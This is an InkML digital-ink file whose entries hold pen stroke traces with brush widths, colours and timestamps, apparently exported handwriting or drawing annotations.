  <inkml:trace contextRef="#ctx0" brushRef="#br0">311 1 24575,'7'39'0,"-6"-36"0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,-2 2 0,-58 69 0,54-63 0,1 0 0,0 1 0,1 0 0,0 0 0,1 1 0,1-1 0,-7 27 0,7-29 0,0 1 0,-1 0 0,0-1 0,-1 0 0,-1 0 0,1-1 0,-1 1 0,-1-2 0,0 1 0,-10 8 0,-31 39 0,35-37 0,9-14 0,0 1 0,0 0 0,1 1 0,0-1 0,0 1 0,0-1 0,1 1 0,0 0 0,1 1 0,-1-1 0,1 0 0,1 1 0,0-1 0,-1 15 0,1 16 0,0-16 0,1 1 0,0 0 0,8 40 0,-4-54 0,0 1 0,1-1 0,0 0 0,1 0 0,0 0 0,0-1 0,13 13 0,-4-3 0,-9-12 0,0 1 0,0-1 0,1-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0-1 0,0 1 0,1-2 0,-1 1 0,1-1 0,-1 0 0,1-1 0,0 0 0,10 0 0,53 9 0,-52-6 0,-1-1 0,23 0 0,3-2 0,-13 0 0,1-1 0,34-5 0,-58 4 0,0 0 0,0-1 0,-1 0 0,1-1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0-1 0,-1 0 0,1 0 0,8-8 0,68-66 0,-76 73 0,-1-1 0,1 1 0,0 1 0,1-1 0,-1 2 0,1-1 0,13-4 0,-13 5 0,0 1 0,-1-2 0,0 1 0,1-1 0,-1 0 0,-1-1 0,1 0 0,9-10 0,60-91 0,-70 96 0,0 0 0,0-1 0,-1 1 0,-1-1 0,0-1 0,0 1 0,-1-1 0,3-20 0,6-13 0,1 1 0,-7 27 0,-2 0 0,0 0 0,0-1 0,-2 1 0,2-38 0,-3 16 0,-1 27 0,0 0 0,-1 0 0,0 0 0,-1 0 0,-1 0 0,0 0 0,-6-21 0,6 30 0,0-1 0,-1 1 0,0 0 0,1 0 0,-2 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,-6-1 0,-11 0 0,0 0 0,0 1 0,-36 4 0,7 0 0,-306-3 0,337 1 20,1 2-1,0 0 0,0 1 0,0 1 1,-26 11-1,-40 9-1500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2:15:26.200"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'3'0,"4"1"0,3 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2:22:05.146"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'4'0'0,"3"0"0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2:22:16.952"/>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2:24:30.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'4'0'0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2:23:37.763"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575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2:26:49.883"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0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2:29:12.468"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1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2:35:37.926"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'3'0'0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2:39:26.527"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'3'0,"3"2"0,5-1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12:45:56.349"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 657 24575,'27'-1'0,"0"2"0,0 0 0,-1 2 0,1 1 0,38 11 0,148 63 0,-133-47 0,-51-19 0,60 17 0,-82-27 0,1 1 0,-1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,6 6 0,-8-6 0,1 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1-1 0,1 1 0,13 2 0,14 2 0,0 2 0,-1 1 0,50 22 0,-41-15 0,56 15 0,32-7 0,-99-19 0,50 17 0,-19-4 0,265 67 0,-282-74 0,61 25 0,88 33 0,-88-34 0,-57-19 0,-1-1 0,53 9 0,73 19 0,-156-40 0,-1 0 0,23 10 0,-24-8 0,0-1 0,30 6 0,236 40 0,-238-39 0,64 11 0,-67-14 0,49 16 0,-26-7 0,176 42 0,-186-42 0,-39-12 0,0 0 0,31 5 0,-24-6 0,-1 1 0,37 14 0,-39-13 0,0 0 0,-1-1 0,2-1 0,20 2 0,79 14 0,-87-13 0,1-2 0,65 4 0,-77-8 0,0 0 0,0 2 0,0 0 0,0 2 0,21 8 0,28 7 0,-26-8 0,1 3 0,47 24 0,-61-25 0,-15-7 0,1 0 0,32 9 0,22 5 0,120 54 0,-179-72 0,0-1 0,0 0 0,1 0 0,0-1 0,-1-1 0,1 0 0,16-1 0,-15 0 0,0 0 0,0 1 0,0 0 0,-1 1 0,1 1 0,13 4 0,-6 0 0,0-2 0,0 0 0,1-1 0,-1-1 0,25 0 0,-25-2 0,109 19 0,1 2 0,-101-17 0,0 2 0,42 16 0,-1-1 0,116 22 0,-151-34 0,58 10 0,-49-11 0,-29-6 0,0 0 0,21 2 0,-13-3 0,1 2 0,47 12 0,-50-9 0,0-2 0,1-1 0,-1 0 0,24 0 0,-19-3 0,51 10 0,-31-3 0,55 11 0,-67-11 0,0-2 0,0-1 0,39 1 0,-69-6 0,22-1 0,1 1 0,-1 2 0,48 9 0,-40-6 0,0-1 0,0-1 0,1-2 0,38-4 0,6 1 0,-46 4 0,50 8 0,-49-5 0,46 2 0,-45-6 0,39 8 0,-38-4 0,38 1 0,-41-4 0,40 7 0,-40-4 0,41 1 0,50 4 0,1 1 0,5 0-110,0 0-597,-86-9 707,86 17 0,9 1 0,-80-17-421,-22-1 356,55 8 0,-72-6 59,27 6-93,0-3 1,68 3-1,-87-9 179,43 9 1,-43-6-3,42 2 1,46-7-79,84 2 0,-122 10 0,-49-7 0,46 3 0,638-8 582,-682 0-582,46-9 0,-45 5 0,44-1 0,1052 5-472,-508 3 280,-586-4 192,45-8 0,27 0 0,-38 5-91,0-3 0,78-19 1,-20 0 598,-28 8 271,-63 11-639,0 2-1,54-4 1,-56 8-140,40-8 0,-9 1 0,51-11 0,-78 12 0,1 1 0,49-1 0,-61 6 0,38-7 0,-38 4 0,37-1 0,-20 5 0,-5 1 0,0-2 0,48-8 0,64-12 0,-26 9 0,-83 11 0,43-8 0,124-42 0,-20-1 0,-54 14 0,-76 23 93,163-39-778,-164 42 679,143-23-31,-126 32 37,-47 4 0,1-2 0,-1-1 0,51-12 0,128-43 99,81-20 450,-110 32-562,26-2 13,-154 39 0,-36 7 0,1-1 0,26-9 0,-10 1 0,0 1 0,1 1 0,0 1 0,38-3 0,82-10 0,-133 17 0,-1 0 0,1-2 0,-1 0 0,0-1 0,23-13 0,12-4 0,-37 16 0,0 0 0,17-13 0,-20 13 0,0 0 0,0 1 0,26-10 0,89-32 0,-60 23 0,-45 16 0,0 2 0,37-10 0,17-1 0,41-6 0,-94 19 0,-1 0 0,0-1 0,-1-2 0,42-21 0,-18 8 0,25-8 0,-19 8 0,66-37 0,-82 39 0,-25 15 0,1-1 0,-2-1 0,1 0 0,14-12 0,-11 7 0,1 1 0,1 1 0,0 0 0,0 1 0,0 1 0,34-12 0,-48 19 0,202-89 0,-184 79 0,32-21 0,-34 20 0,36-19 0,-19 13 0,48-33 0,-75 45 0,33-21 0,53-33 0,91-56 0,-143 93 0,2 1 0,0 2 0,2 3 0,71-20 0,-94 31 0,-1-1 0,21-10 0,-26 9 0,1 1 0,1 1 0,-1 1 0,21-4 0,4 2 0,0-3 0,0-1 0,67-29 0,63-31 0,-146 61 0,0-2 0,-1 0 0,47-31 0,-62 35 0,8-6 0,33-20 0,-4 6 0,-30 17 0,1 0 0,25-10 0,-30 14 0,0 0 0,0 0 0,-1-2 0,13-9 0,-13 7 0,2 2 0,-1 0 0,19-9 0,-18 11-227,0-1-1,-1-1 1,0 0-1,-1-1 1,18-15-1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1:56:05.178"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">578 0 24575,'8'3'0,"-14"3"0,-15 3 0,-1-3 0,0 1 0,0 1 0,1 1 0,0 1 0,1 1 0,0 1 0,0 1 0,2 0 0,-1 1 0,-30 33 0,36-36 0,0 0 0,-1-1 0,0 0 0,-25 12 0,21-12 0,0 1 0,-23 18 0,34-24 0,0 0 0,0 0 0,-1-1 0,1 0 0,-11 3 0,-18 10 0,33-15 0,0 1 0,0 0 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,0 1 0,-1 0 0,2 0 0,-2 9 0,0 6 0,1 0 0,4 37 0,-1-16 0,-1-31 0,0-1 0,0 1 0,1-1 0,0 0 0,1 1 0,0-1 0,0 0 0,6 9 0,1 1 0,0 0 0,18 21 0,-20-30 0,-1-1 0,1 0 0,1 0 0,-1-1 0,1 0 0,1-1 0,-1 0 0,1 0 0,0-1 0,0 0 0,1-1 0,18 6 0,24 7 0,-42-13 0,-1 0 0,1 0 0,1-1 0,-1-1 0,14 2 0,-7-2 0,-1 1 0,1 0 0,28 11 0,9 1 0,-28-8 0,-1-2 0,1-1 0,44 1 0,-37-4 0,-21 0 0,1-1 0,-1 0 0,24-4 0,-33 3 0,-1 1 0,0-1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,3-6 0,-2 2 0,0 0 0,1 1 0,0 0 0,1-1 0,-1 1 0,1 1 0,0-1 0,9-6 0,23-23 0,-34 28 0,0 0 0,0 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-1 1 0,0-1 0,0-7 0,3-33 0,5-10 0,-3-1 0,-5-110 0,-2 68 0,1 86-114,0 1 1,0 0-1,-2 0 0,0 0 0,0 1 1,-1-1-1,0 1 0,-1 0 0,-1 0 1,0 0-1,-14-21 0,12 24-6712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12:45:57.860"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'371'0'0,"-355"1"0,1 1 0,28 6 0,-28-4 0,1-1 0,20 1 0,17-5 0,27 0 0,-76 1 0,1 1 0,-1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,6 4 0,-8-3 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,2 12 0,0 8 0,-1 0 0,-3 35 0,1-42 0,-2 6 0,-1 1 0,-1-1 0,-12 39 0,-3 17 0,7-17 0,-34 100 0,33-128-341,2 1 0,1 0-1,-6 46 1,15-65-6485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12:45:59.103"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'4'0,"0"5"0,0 4 0,0 4 0,0 3 0,0 1 0,0 1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0-1 0,0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12:46:01.044"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">239 23 24575,'-4'2'0,"0"0"0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-3 3 0,-2 2 0,-41 49 0,39-44 0,0-1 0,-1-1 0,0 0 0,-23 19 0,31-29 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1 0,0 4 0,-9 54 0,5-25 0,4-26 0,0 1 0,0-1 0,2 1 0,-1-1 0,1 1 0,1-1 0,0 1 0,2 11 0,-1-18 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,0 1 0,0-1 0,0-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,7 4 0,52 36 0,-50-31 0,1-2 0,0 0 0,0-1 0,1-1 0,20 8 0,-20-11 0,1-2 0,25 3 0,13 2 0,-14-3 0,0-1 0,0-1 0,65-6 0,-17 1 0,-5 4 0,92-5 0,-170 3 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,7-7 0,-2-1 0,0 0 0,-1 0 0,0-1 0,11-25 0,10-13 0,-22 41 0,-1-1 0,-1 0 0,0 0 0,0-1 0,-1 1 0,-1-1 0,0-1 0,0 1 0,-2 0 0,3-18 0,-5 29 0,1-27 0,1 1 0,8-34 0,-9 54 0,1 1 0,-1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,-2-11 0,1 14 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-6-3 0,-141-75 0,137 73 0,0 0 0,0 1 0,-1 1 0,0 0 0,0 0 0,0 2 0,0-1 0,-1 2 0,-22-1 0,18 3-112,3 0-27,0-1 0,1 0-1,-1-1 1,0-1 0,1 0 0,-1 0-1,1-2 1,-23-8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12:46:05.225"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">20600 1913 24575,'-3'-1'0,"-1"0"0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,-2-3 0,-9-6 0,-6-2 0,4 1 0,-2 1 0,1 1 0,-2 1 0,-27-12 0,32 16 0,1-1 0,0-1 0,1 0 0,0 0 0,0-1 0,1-1 0,0 0 0,-14-16 0,11 10 0,-2 1 0,0 1 0,-19-13 0,4 8 0,-38-16 0,58 29 0,0-2 0,0 1 0,0-1 0,1-1 0,-12-12 0,9 8 0,-30-22 0,-121-86 0,156 114 0,-36-24 0,26 19 0,0-1 0,-24-24 0,23 19 0,-1 1 0,-37-26 0,48 39 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1 1 0,-17-3 0,17 3 0,-1 0 0,1 0 0,0 0 0,0-1 0,1-1 0,-1 0 0,-13-7 0,-106-79 0,110 78 0,0 1 0,-1 1 0,-22-9 0,-3-1 0,4 1 0,-39-21 0,66 30 0,-1 2 0,-1 0 0,0 0 0,0 2 0,0 0 0,0 0 0,-1 2 0,0 0 0,-22-3 0,19 4 0,0 0 0,0-2 0,0 0 0,0-1 0,1-1 0,0 0 0,1-2 0,-26-15 0,19 11 0,-34-11 0,-8-4 0,41 17 0,-54-16 0,54 20 0,-1-2 0,-32-15 0,41 16 0,0 2 0,0 0 0,-1 1 0,0 1 0,-22-2 0,15 2 0,-45-13 0,36 4 0,-1 2 0,0 1 0,-1 2 0,0 2 0,-56-3 0,71 7 0,1 0 0,-1-2 0,1 0 0,0-1 0,0-1 0,1 0 0,-29-15 0,36 17 0,0 0 0,0 0 0,0 1 0,0 1 0,-14-1 0,12 1 0,-1 0 0,1-1 0,-20-6 0,-136-48 0,10 13 0,52 22 0,75 14 0,7 1 0,0 2 0,-54-5 0,49 8 0,-33-7 0,34 4 0,-42-1 0,35 4 0,-45-8 0,7 0 0,-55-10 0,80 10 0,34 6 0,-1 0 0,-31-1 0,-14 4 0,22 2 0,0-3 0,-57-9 0,-77-11 0,35 1 0,49 8 0,16 4 0,-34-1 0,71 8 0,-36-7 0,34 4 0,-1 2 0,0 1 0,-40 4 0,-68-3 0,76-10 0,46 7 0,-50-4 0,-532 9 0,577-2 0,-47-9 0,45 5 0,-42-1 0,-880 7 0,939-2 0,-1-1 0,-28-6 0,27 4 0,1 1 0,-22-1 0,-535 2 0,280 4 0,273-2 0,1 1 0,-1 1 0,-35 8 0,-1 1 0,-92 6 0,104-13 0,-14 6 0,43-6 0,0-1 0,-23 1 0,19-2 0,-35 7 0,35-5 0,-37 3 0,-6-7 0,34-1 0,0 2 0,1 0 0,-50 10 0,54-7 0,0-1 0,-1-1 0,1-1 0,-29-2 0,-48 1 0,-17 21 0,71-19 0,-49 10 0,-47 10 0,110-18 0,-1-1 0,-48-2 0,48-2 0,0 2 0,-49 7 0,10 2 0,-1-4 0,-131-6 0,84-2 0,56 2 0,-3-2 0,0 4 0,-69 11 0,84-7 0,0-2 0,-58-4 0,59-1 0,1 3 0,-66 9 0,76-7 0,0 0 0,-67-5 0,-30 3 0,62 8 0,47-5 0,-48 2 0,-698-8 0,752 2 0,0 2 0,0 0 0,-39 12 0,38-9 0,0 0 0,0-2 0,-32 2 0,21-3 0,1 1 0,-56 14 0,11-1 0,-73 7 0,51-5 0,9 0 0,24-8 0,37-5 0,-1-2 0,-35 1 0,-113 9 0,98-5 0,14 1 0,39-6 0,-46 3 0,40-7 0,0 2 0,-47 8 0,43-5 0,1-1 0,-1-3 0,-44-3 0,-65 3 0,89 10 0,43-8 0,0 0 0,-23 2 0,18-5 0,1 1 0,-1 1 0,1 1 0,0 1 0,0 1 0,0 1 0,1 0 0,-28 14 0,34-15 0,0 0 0,0-1 0,0-1 0,0 0 0,-26 2 0,21-4 0,0 2 0,-25 7 0,-260 73 0,150-55 0,131-25 0,1 2 0,-27 8 0,25-6 0,-37 7 0,-72 16 0,102-21 0,0-1 0,-1-1 0,0-2 0,-40 1 0,54-5 0,1 1 0,0 0 0,1 1 0,-32 11 0,31-9 0,0 0 0,0-1 0,-1-1 0,-25 2 0,-2-1 0,-1 2 0,1 2 0,-57 17 0,49-12 0,37-9 0,-13 4 0,0-2 0,-1-1 0,-42 2 0,42-4 0,0 1 0,1 2 0,-1 0 0,-43 17 0,21-7 0,14-5 0,-55 7 0,52-10 0,-54 18 0,55-14 0,-49 8 0,74-17 0,-1 0 0,-25 11 0,29-9 0,0-1 0,0 0 0,-1-1 0,1-1 0,-16 2 0,-6-2 0,0 0 0,0 3 0,0 0 0,1 2 0,-1 2 0,-53 21 0,59-20 0,0-1 0,0-2 0,-1 0 0,-56 5 0,82-12 0,-40 4 0,31-4 0,1 0 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,-10 6 0,2-1 0,0-1 0,-35 9 0,-10 3 0,42-12 0,-1-1 0,-37 5 0,34-7 0,-44 13 0,-126 48 0,162-55 0,-51 10 0,-24 6 0,77-16 0,-38 5 0,39-10 0,-50 17 0,35-6 0,-1-2 0,-49 9 0,21-16 0,55-6 0,0 0 0,1 1 0,0 1 0,-25 8 0,-74 24 0,-63 25 0,169-56 0,0-1 0,0 0 0,-15 2 0,16-4 0,-1 1 0,1 1 0,0 0 0,-13 5 0,4 0 0,-1-1 0,0-1 0,0-1 0,-26 3 0,18-4 0,-41 14 0,63-16-124,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0-1,0-1 1,0 0 0,0 0 0,-6-1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12:46:06.469"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">440 1 24575,'-3'1'0,"1"1"0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0-1 0,-1 5 0,-5 5 0,-11 11 0,-1-1 0,-23 21 0,34-35 0,-1 0 0,0 0 0,-1-1 0,0 0 0,0-1 0,-1-1 0,-14 6 0,19-8 0,0 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-6 12 0,-25 31 0,7-22 0,-9 12 0,35-36 0,-2 1 0,1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,1 0 0,-3 8 0,5-11 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,1 1 0,16 7 0,1 0 0,-1-1 0,1-1 0,36 8 0,4 2 0,-17 1 0,6 3 0,-11-9 0,48 21 0,5 2 0,-89-34 0,178 63 0,-166-56-1365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12:46:08.824"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 69 24575,'0'-2'0,"1"1"0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,2 0 0,39-18 0,-34 16 0,1-1 0,0 1 0,0 1 0,0-1 0,1 1 0,-1 1 0,1 0 0,0 1 0,16 1 0,-24-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 6 0,0 15 0,0 0 0,-2 0 0,-3 26 0,0 6 0,1-38 0,0-1 0,-2 1 0,0-1 0,-1 0 0,-1-1 0,-16 32 0,9-18 0,-40 59 0,57-90 0,0 1 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0 0,7-4 0,182-87 0,-177 85-44,0 1 0,0 1 0,18-4 0,-12 4-1145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12:46:11.427"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">544 24 24575,'-26'-1'0,"15"0"0,-1 1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 1 0,-1 1 0,1 0 0,0 0 0,-20 10 0,-32 15 0,54-25 0,0 0 0,0 0 0,0 1 0,0 1 0,1-1 0,0 1 0,0 1 0,0-1 0,1 1 0,0 1 0,0-1 0,-10 13 0,-17 27 0,24-34 0,1 0 0,0 1 0,1 0 0,0 0 0,1 0 0,0 1 0,-8 25 0,13-32 0,-1 0 0,1 0 0,-2 0 0,1-1 0,-1 1 0,0-1 0,-5 6 0,5-7 0,0 0 0,0 1 0,1-1 0,-1 1 0,2 0 0,-1 0 0,0 0 0,1 0 0,0 1 0,-1 7 0,-6 50 0,3-31 0,2 0 0,0 40 0,4-64 0,1 1 0,-1-1 0,2 0 0,-1 0 0,2 1 0,-1-1 0,1 0 0,0-1 0,1 1 0,0 0 0,0-1 0,8 11 0,9 10 0,24 29 0,-41-53 0,0 0 0,0 0 0,-1 1 0,0-1 0,4 8 0,-6-8 0,1-1 0,0 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,1-1 0,-1 0 0,7 5 0,9 2 0,33 14 0,1 0 0,-38-17 0,0 0 0,1-2 0,0 0 0,0 0 0,30 3 0,-8-4 0,53-1 0,-35-2 0,-19 0 0,48-5 0,-75 3 0,0 0 0,-1-1 0,1 0 0,-1-1 0,1 0 0,-1-1 0,0 0 0,0 0 0,15-10 0,15-12 0,-29 20 0,0 0 0,-1 0 0,1-1 0,-2-1 0,1 0 0,8-9 0,31-39 0,-24 30 0,24-35 0,-41 50 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,5-25 0,12-71 0,-18 91 0,0-1 0,10-24 0,-8 25 0,0-1 0,4-21 0,-7 24 0,1 0 0,9-24 0,-8 28 0,-1-1 0,0 1 0,-1-1 0,-1 0 0,2-14 0,-4 21 0,2-14 0,-1 0 0,-2-1 0,1 1 0,-5-22 0,4 36 0,-1 0 0,1-1 0,-1 2 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,-1 0 0,-8-4 0,-11-3 0,1 0 0,-1 2 0,0 1 0,-49-7 0,22 4 0,29 6 0,0 0 0,-35-1 0,14 5-1365,24 1-5461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4:27:25.030"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1'0'0,"1"1"0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 3 0,13 25 0,-11-15 0,0 1 0,0-1 0,-2 1 0,1 0 0,-2 18 0,0-14 0,0 0 0,6 27 0,-1-10-455,0-1 0,-2 68 0,-3-85-6371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4:27:27.133"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
